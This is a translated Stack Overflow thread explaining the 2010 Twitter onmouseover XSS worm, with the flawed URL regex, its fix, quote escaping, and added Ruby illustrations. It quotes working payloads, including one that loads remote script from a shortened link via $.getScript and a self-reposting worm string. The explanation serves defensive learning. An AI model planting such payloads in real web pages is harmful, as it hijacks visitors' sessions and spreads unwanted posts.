
Notice: this page is a Chinese-English parallel translation of a popular Stack Overflow question, released under the CC BY-SA 4.0 licence. If you use it you must comply with the same CC BY-SA licence, cite the original address and author information, and attribute it to the original author (not me). Stack Overflow original: http://stackoverflow.com/questions/3762746/
Warning: these are provided under cc-by-sa 4.0 license. You are free to use/share it, But you must attribute it to the original authors (not me): StackOverFlow

Date: 2020-10-25 02:10:10  Source: igfitidea

Today's XSS onmouseover exploit on twitter.com

Tags: javascript, jquery, security, twitter, xss

Asked by ibz

Can you explain what exactly happened on Twitter today? Basically the exploit was causing people to post a tweet containing this link:


http://t.co/@"style="font-size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')"/

Is this technically an XSS attack or something else?


Here is how the Twitter home page looked like: http://www.flickr.com/photos/travelist/6832853140/


Accepted answer by Michael Foukarakis

The vulnerability is because URLs were not being parsed properly. For example, the following URL is posted to Twitter:


http://thisisatest.com/@"onmouseover="alert('test xss')"/

Twitter treats this as the URL. When it is parsed Twitter wraps a link around that code, so the HTML now looks like:


<a href="http://thisisatest.com/@"onmouseover="alert('test xss')"rel/" target="_blank" ="">http://thisisatest.com/@"onmouseover="alert('test xss')"/</a>

You can see that by putting in the URL and the trailing slash, Twitter thinks it has a valid URL even though it contains a quote mark in it which allows it to escape (ie. terminate the href attribute, for the pedants out there) the URL attribute and include a mouse over. You can write anything to the page, including closing the link and including a script element. Also, you are not limited by the 140 character limit because you can use $.getScript().


This commit, if it were pulled, would have prevented this XSS vulnerability.


In detail, the offending regex was:


REGEXEN[:valid_url_path_chars] = /(?:
  #{REGEXEN[:wikipedia_disambiguation]}|
  @[^\/]+\/|
  [\.\,]?#{REGEXEN[:valid_general_url_path_chars]}
)/ix

The @[^\/]+\/ part allowed any character (except a forward slash) when it was prefixed by an @ sign and suffixed by a forward slash.


By changing to @#{REGEXEN[:valid_general_url_path_chars]}+\/ it now only allows valid URL characters.

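As an added illustration (not code from the twitter-text gem or from this answer), the two versions of the path regex run against the test URL from the answer; REGEXEN[:valid_general_url_path_chars] is replaced by a simplified stand-in character class, which is an assumption, but like the real one it contains no double quote or space.

```ruby
# Simplified stand-in for REGEXEN[:valid_general_url_path_chars] (assumption):
# letters, digits and common URL path punctuation, no double quote, no space.
GENERAL_PATH_CHAR = /[a-z0-9!\*';:=\+\$\/%#\[\]\-_,~]/i

# Before the fix: after an "@", anything that is not a slash is accepted up to the next slash.
VULN_PATH_CHARS  = /(?:@[^\/]+\/|[\.\,]?#{GENERAL_PATH_CHAR})/i
# After the fix: after an "@", only valid URL path characters are accepted.
FIXED_PATH_CHARS = /(?:@#{GENERAL_PATH_CHAR}+\/|[\.\,]?#{GENERAL_PATH_CHAR})/i

# Pull the first URL out of tweet text the way an autolinker would, given a path-char class.
def extract_url(text, path_chars)
  m = text.match(%r{https?://[a-z0-9\-\.]+\.[a-z]{2,}(?:/(?:#{path_chars})*)?}i)
  m && m[0]
end

# Wrap the extracted URL in an anchor without escaping, as the vulnerable page did.
def autolink_unescaped(text, path_chars)
  url = extract_url(text, path_chars)
  url ? text.sub(url, %(<a href="#{url}">#{url}</a>)) : text
end

# The test URL quoted in the answer.
PAYLOAD = %q{http://thisisatest.com/@"onmouseover="alert('test xss')"/}

if __FILE__ == $0
  puts extract_url(PAYLOAD, VULN_PATH_CHARS)   # the whole payload, quotes included
  puts extract_url(PAYLOAD, FIXED_PATH_CHARS)  # stops at the quote: http://thisisatest.com/
  puts autolink_unescaped(PAYLOAD, VULN_PATH_CHARS)
end
```

With the vulnerable class the anchor's href is terminated by the payload's first quote and onmouseover becomes a separate attribute; with the fixed class the quote and everything after it stay outside the link.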

Answered by rook

Yes this is XSS, it is attacking a javascript event handler. What is cool about this XSS is that it doesn't require <> to exploit. The injected string is: size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')".


The size:999999999999px makes it very large and therefore more likely that someone will mouse over it. The real problem is the onmouseover= event handler.


To prevent this in PHP you need to convert quote marks into their html entities: $var=htmlspecialchars($var,ENT_QUOTES);


This is because in HTML you cannot escape quotes like in SQL: \'


Answered by ACP

The exploit was a classic piece of Javascript injection. Suppose you write a tweet with the following text:


"http://www.guardian.co.uk/technology is the best!"

When you view the Twitter web page, that becomes a link, like so:


<a href="http://www.guardian.co.uk/technology" class="tweet-url web" 
 rel="nofollow">http://www.guardian.co.uk/technology</a> is the best!

The exploit attacked that link-making function. The raw text of the exploit tweet would read something like this:


http://a.no/@";onmouseover=";$('textarea:first').val(this.innerHTML);
   $('.status-update-form').submit();"class="modal-overlay"/

Which Twitter didn't protect properly, probably because the @" character combination broke their [HTML] parser. That link would generate the following page source:


<a href="http://a.no/@";onmouseover=";$('textarea:first').val(this.innerHTML);
 $('.status-update-form').submit();"class="modal-overlay"/ class="tweet-url web"
      rel="nofollow">

This means that executable content (the onMouseOver="stuff" bit) has ended up in the page source code. Not knowing any better, the browser runs this code. Because it's running in the user's browser, it can do anything the user does; most variations used this power to re-post the content, which is why it spread like a virus. To encourage the user to activate the code by mousing over, they also formatted the block as black-on-black using CSS [Cascading Style Sheets, which determines the page layout]. Other versions were hacked around by users to have all sorts of other effects, such as porn site redirects, rainbow text in their tweets, and so forth. Some of them popped up dialog boxes designed to alarm the users, talking about accounts being disabled or passwords stolen (they weren't, in either case).


Twitter fixed this not by blocking the string onMouseOver (which some dim-witted blogs were calling for) but by properly sanitising the input. The " marks in these tweets are now turned into &quot; – the HTML-escaped form.


Technically this is a second-order injection attack; the attack string is inserted into the database and handled correctly, but then the attack takes place as the string is read back out instead. It's not that complex an attack at all either - rather embarrassing for Twitter that they were caught out by this.


Source: The Twitter hack: how it started and how it worked

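The fix that this answer and rook's answer describe, as an added example that is not Twitter's or either answer's own code: quotes in the attribute are HTML-escaped (CGI.escapeHTML is the Ruby counterpart of PHP's htmlspecialchars with ENT_QUOTES), and a deliberately simple attribute tokenizer shows which attributes a browser would see in each case. The link-building functions and the tokenizer are assumptions for illustration.

```ruby
require 'cgi'

# The link text from the accepted answer, already treated as one "URL" by the broken parser.
PAYLOAD = %q{http://thisisatest.com/@"onmouseover="alert('test xss')"/}

# The broken rendering: the URL goes straight into the attribute and the text node.
def link_unescaped(url)
  %(<a href="#{url}" rel="nofollow">#{url}</a>)
end

# The fixed rendering: CGI.escapeHTML turns " into &quot; (and ' into &#39;, < into &lt;,
# & into &amp;), so the value can no longer terminate the attribute it sits in.
def link_escaped(url)
  safe = CGI.escapeHTML(url)
  %(<a href="#{safe}" rel="nofollow">#{safe}</a>)
end

# Deliberately simple tokenizer: name="value" pairs inside the opening <a ...> tag,
# splitting on unescaped quotes the way a browser's attribute parser would.
def attribute_names(html)
  open_tag = html[/<a\s+([^>]*)>/, 1] or return []
  open_tag.scan(/([a-z]+)="[^"]*"/i).flatten
end

if __FILE__ == $0
  p attribute_names(link_unescaped(PAYLOAD))  # ["href", "onmouseover", "rel"]
  p attribute_names(link_escaped(PAYLOAD))    # ["href", "rel"]
end
```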

Answered by Adam

It's an XSS exploit. As Twitter admitted in their update. You can prevent attacks like that by never allowing users to post javascript code. You should always filter it out. More information about avoiding XSS can be found here: http://www.owasp.org/index.php/Cross-site_Scripting_(XSS)


Answered by Wade Tandy

From Wikipedia: "Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users."


Today's attack fits the bill to me.


Basically there was some sort of parsing error with Twitter.com display code. When they converted URLs to HTML hyperlinks, they weren't handling @ characters correctly and this was causing javascript events to be inserted into the HTML link.
